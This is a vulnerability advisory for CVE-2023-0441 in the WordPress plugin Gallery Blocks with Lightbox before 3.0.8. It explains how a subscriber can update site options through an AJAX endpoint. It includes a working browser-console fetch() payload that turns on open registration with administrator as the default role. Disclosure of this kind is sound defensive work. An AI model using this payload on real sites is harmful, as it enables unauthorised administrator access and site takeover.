Gallery Blocks with Lightbox < 3.0.8 – Subscriber+ Arbitrary Options Update | CVE 2023-0441

Description

The plugin has an AJAX endpoint that can be accessed by any authenticated users, such as subscriber. The callback function allows numerous actions, the most serious one being reading and updating the WordPress options which could be used to enable registration with a default administrator user role.

Proof of Concept

Run the below command in the developer console of the web browser while being on the on the welcome page of the plugin (/wp-admin/admin.php?page=pgc-simply-welcome) as a subscriber, this will enable registration with a default administrator role.

fetch( '/wp-admin/admin-ajax.php', {method:'POST', headers:{'Content-Type': 'application/x-www-form-urlencoded'}, body: 'action=pgc_sgb_action_wizard&nonce=' + PGC_SGB_WELCOME_PAGE.nonce + '&props=' + JSON.stringify({options:{users_can_register: 1,default_role: 'administrator'},type: 'update_option'}) } );